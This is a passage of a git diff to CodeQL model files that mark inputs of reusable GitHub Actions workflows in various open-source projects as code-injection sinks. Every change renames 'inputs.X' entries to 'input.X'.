"generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.base_image", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.family", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.model", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.variant", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-bundles-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-acceptance-test.yaml", "*", "inputs.port", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-acceptance-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-provider-upgrade-latest-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-provider-upgrade-latest-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] \ No newline at end of file + - ["kairos-io/kairos/.github/workflows/reusable-zfs-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "input.family", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-reset-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.base_image", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.family", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.model", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.variant", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-bundles-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-acceptance-test.yaml", "*", "input.port", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-acceptance-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-provider-upgrade-latest-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-provider-upgrade-latest-test.yaml", "*", "input.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml index a63ddd5da67..4b485083191 100644 --- a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kanidm/kanidm/.github/workflows/kanidm_individual_book.yml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file + - ["kanidm/kanidm/.github/workflows/kanidm_individual_book.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml index e73d0d81875..f45709cfa0f 100644 --- a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml @@ -3,18 +3,18 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kata-containers/kata-containers/.github/workflows/release-s390x.yaml", "*", "inputs.target-arch", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/release-ppc64le.yaml", "*", "inputs.target-arch", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/release-arm64.yaml", "*", "inputs.target-arch", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/release-amd64.yaml", "*", "inputs.target-arch", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "inputs.tag", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "inputs.repo", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "inputs.registry", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "inputs.tag", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "inputs.repo", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "inputs.registry", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "inputs.tag", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "inputs.repo", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "inputs.registry", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-amd64.yaml", "*", "inputs.tag", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-amd64.yaml", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file + - ["kata-containers/kata-containers/.github/workflows/release-s390x.yaml", "*", "input.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-ppc64le.yaml", "*", "input.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-arm64.yaml", "*", "input.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-amd64.yaml", "*", "input.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "input.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "input.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "input.registry", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "input.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "input.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "input.registry", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "input.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "input.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "input.registry", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-amd64.yaml", "*", "input.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-amd64.yaml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml index 3a911989874..1d8dc84c2f0 100644 --- a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml @@ -3,14 +3,14 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.build_mode", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.release_branch", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.images_tag", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.quay_org", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/integration-tests-frontend.yml", "*", "inputs.istio_version", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/integration-tests-frontend-tempo.yml", "*", "inputs.istio_version", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/integration-tests-frontend-multicluster-primary-remote.yml", "*", "inputs.istio_version", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/integration-tests-frontend-multicluster-multi-primary.yml", "*", "inputs.istio_version", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/integration-tests-backend.yml", "*", "inputs.istio_version", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/integration-tests-backend-multicluster-external-controlplane.yml", "*", "inputs.istio_version", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/build-frontend.yml", "*", "inputs.target_branch", "code-injection", "generated"] \ No newline at end of file + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.build_mode", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.release_branch", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.images_tag", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.quay_org", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-tempo.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-multicluster-primary-remote.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-multicluster-multi-primary.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-backend.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-backend-multicluster-external-controlplane.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/build-frontend.yml", "*", "input.target_branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml index 3c525970ecc..f404aa73762 100644 --- a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kotest/kotest/.github/workflows/run-gradle.yml", "*", "inputs.task", "code-injection", "generated"] \ No newline at end of file + - ["kotest/kotest/.github/workflows/run-gradle.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml index 187b3d2fd0a..2f546ce3f57 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-k8s-e2e.yaml", "*", "inputs.k8s-version", "code-injection", "generated"] - - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-images.yaml", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-k8s-e2e.yaml", "*", "input.k8s-version", "code-injection", "generated"] + - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-images.yaml", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml index 3e11359c6b3..9e8b1e43993 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "inputs.image_tag", "code-injection", "generated"] - - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "inputs.image_name", "code-injection", "generated"] - - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "inputs.client", "code-injection", "generated"] - - ["kubescape/kubescape/.github/workflows/a-pr-scanner.yaml", "*", "inputs.UNIT_TESTS_PATH", "code-injection", "generated"] \ No newline at end of file + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_tag", "code-injection", "generated"] + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_name", "code-injection", "generated"] + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.client", "code-injection", "generated"] + - ["kubescape/kubescape/.github/workflows/a-pr-scanner.yaml", "*", "input.UNIT_TESTS_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml index 819f9f0e35d..20a24a4ec7f 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "inputs.next-version", "code-injection", "generated"] - - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "inputs.release-branch", "code-injection", "generated"] + - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "code-injection", "generated"] + - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.release-branch", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml index 9f30976bbad..666a86caf88 100644 --- a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "inputs.VERSION_NAME", "code-injection", "generated"] - - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "inputs.REGISTRY", "code-injection", "generated"] - - ["kumahq/kuma/.github/workflows/_test.yaml", "*", "inputs.FULL_MATRIX", "code-injection", "generated"] - - ["kumahq/kuma/.github/workflows/_e2e.yaml", "*", "inputs.matrix", "code-injection", "generated"] \ No newline at end of file + - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.VERSION_NAME", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.REGISTRY", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_test.yaml", "*", "input.FULL_MATRIX", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_e2e.yaml", "*", "input.matrix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml index 81a419fec0d..d4926952f1a 100644 --- a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml @@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["labring/sealos/.github/workflows/services.yml", "*", "inputs.push_image_tag", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/services.yml", "*", "inputs.push_image", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "inputs.build_from", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "inputs.push_image_tag", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "inputs.push_image", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/import-patch-image.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/frontend.yml", "*", "inputs.push_image_tag", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/frontend.yml", "*", "inputs.push_image", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/controllers.yml", "*", "inputs.push_image_tag", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/controllers.yml", "*", "inputs.push_image", "code-injection", "generated"] \ No newline at end of file + - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "input.build_from", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "input.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "input.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/import-patch-image.yml", "*", "input.arch", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/frontend.yml", "*", "input.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/frontend.yml", "*", "input.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/controllers.yml", "*", "input.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/controllers.yml", "*", "input.push_image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml index 35fd748afbe..144c16ff8de 100644 --- a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["laion-ai/open-assistant/.github/workflows/docker-build.yaml", "*", "inputs.context", "code-injection", "generated"] \ No newline at end of file + - ["laion-ai/open-assistant/.github/workflows/docker-build.yaml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml index 192b1b60843..f97ee81bcb9 100644 --- a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "inputs.release_id", "code-injection", "generated"] - - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "inputs.filename", "code-injection", "generated"] - - ["learningequality/kolibri/.github/workflows/pypi_upload.yml", "*", "inputs.tar-file-name", "code-injection", "generated"] - - ["learningequality/kolibri/.github/workflows/pypi_upload.yml", "*", "inputs.whl-file-name", "code-injection", "generated"] \ No newline at end of file + - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.release_id", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.filename", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/pypi_upload.yml", "*", "input.tar-file-name", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/pypi_upload.yml", "*", "input.whl-file-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml index 5a397f743a3..401875059ec 100644 --- a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lensesio/stream-reactor/.github/workflows/build.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["lensesio/stream-reactor/.github/workflows/build.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml index 97f40ee7c07..6d6f9e17740 100644 --- a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "inputs.directory", "code-injection", "generated"] - - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "inputs.cargo_make_task", "code-injection", "generated"] - - ["leptos-rs/leptos/.github/workflows/get-changed-examples-matrix.yml", "*", "inputs.example_changed", "code-injection", "generated"] \ No newline at end of file + - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.directory", "code-injection", "generated"] + - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.cargo_make_task", "code-injection", "generated"] + - ["leptos-rs/leptos/.github/workflows/get-changed-examples-matrix.yml", "*", "input.example_changed", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml index 293939322e2..a4b2b55262f 100644 --- a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "inputs.push_to_s3", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "inputs.pl_version", "code-injection", "generated"] \ No newline at end of file + - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.push_to_s3", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.pl_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml index c3aa198743d..dd3bfe71b7b 100644 --- a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["liquibase/liquibase/.github/workflows/build-azure-uber-jar.yml", "*", "inputs.liquibase-version", "code-injection", "generated"] \ No newline at end of file + - ["liquibase/liquibase/.github/workflows/build-azure-uber-jar.yml", "*", "input.liquibase-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml index 1ea78b01cd6..2207feeec22 100644 --- a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["litestar-org/litestar/.github/workflows/test.yml", "*", "inputs.python-version", "code-injection", "generated"] - - ["litestar-org/litestar/.github/workflows/notify-released-issues.yml", "*", "inputs.release_tag", "code-injection", "generated"] \ No newline at end of file + - ["litestar-org/litestar/.github/workflows/test.yml", "*", "input.python-version", "code-injection", "generated"] + - ["litestar-org/litestar/.github/workflows/notify-released-issues.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml index 23bd3adc5a4..2128369a7a9 100644 --- a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.package_name_prefix", "code-injection", "generated"] - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.install", "code-injection", "generated"] - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.llvm_force_enable_stats", "code-injection", "generated"] - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.llvm_enable_assertions", "code-injection", "generated"] - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.build_shared_libs", "code-injection", "generated"] - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.cmake_build_type", "code-injection", "generated"] - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.cmake_cxx_compiler", "code-injection", "generated"] - - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.cmake_c_compiler", "code-injection", "generated"] \ No newline at end of file + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.package_name_prefix", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.install", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.llvm_force_enable_stats", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.llvm_enable_assertions", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.build_shared_libs", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.cmake_build_type", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.cmake_cxx_compiler", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.cmake_c_compiler", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml index 77c7570ec0e..57791c68c0a 100644 --- a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lnbits/lnbits/.github/workflows/make.yml", "*", "inputs.make", "code-injection", "generated"] \ No newline at end of file + - ["lnbits/lnbits/.github/workflows/make.yml", "*", "input.make", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml index 46cc5092355..2a65a351255 100644 --- a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lutris/lutris/.github/workflows/publish-ppa.yml", "*", "inputs.PPA_URI", "code-injection", "generated"] \ No newline at end of file + - ["lutris/lutris/.github/workflows/publish-ppa.yml", "*", "input.PPA_URI", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml index 78a5584d04b..53f6f6da728 100644 --- a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml +++ 